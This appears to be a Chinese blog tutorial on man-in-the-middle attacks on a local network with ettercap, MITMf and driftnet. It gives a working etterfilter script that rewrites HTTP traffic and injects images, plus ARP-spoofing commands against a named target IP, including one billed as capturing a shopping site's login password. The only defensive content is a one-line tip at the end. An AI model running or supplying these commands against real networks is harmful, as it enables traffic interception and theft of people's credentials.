工具介绍
- ettercap
- mitmtf
3070网卡(大力推荐)
ettercap进行中间人攻击
替换图片
先利用
vim
新建一个kali.filter
写入下面代码并保存if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Rubbish!"); #note: replacement string is same length as original string msg("zapped Accept-Encoding!\n"); } } if (ip.proto == TCP && tcp.src == 80) { replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" "); replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" "); msg("Filter Ran.\n"); }
将其转变为二进制文件
etterfilter kali.filter -o kali.ef
执行命令
ettercap -T -q -F ig.ef -M ARP /目标ip///
效果如下
mitmf操作
替换网页中的图片
首先在
root
下创建一个img
的文件夹,在文件夹中放入图片。
执行命令python mitmf.py -i wlan0 --spoof --arp --gateway 192.168.5.1 --target 192.168.5.202 --imgrand --img-dir /root/img
PS:
192.168.5.1 为路由器网关 192.168.5.202 为目标。
访问某宝效果如下:获取某宝登录密码
python mitmf.py -i wlan0 --spoof --arp --gateway 192.168.5.1 --target 192.168.5.202
将所有的图片选择180°
python mitmf.py -i wlan0 --spoof --arp --gateway 192.168.5.1 --target 192.168.5.202 --upsidedownternet
其他命令可以参考官网,这里不在演示。嗅探浏览的图片
在通过
ettercap
进行中间人攻击后,我们可以利用driftnet
来获取对方浏览的图片。命令如下:driftnet -i waln0
防御
可以在路由器防火墙中开启
arp
攻击,来防御中间人攻击。mitmf安装
参考文章:
One comment
我觉得还是好深奥,不过我是个小白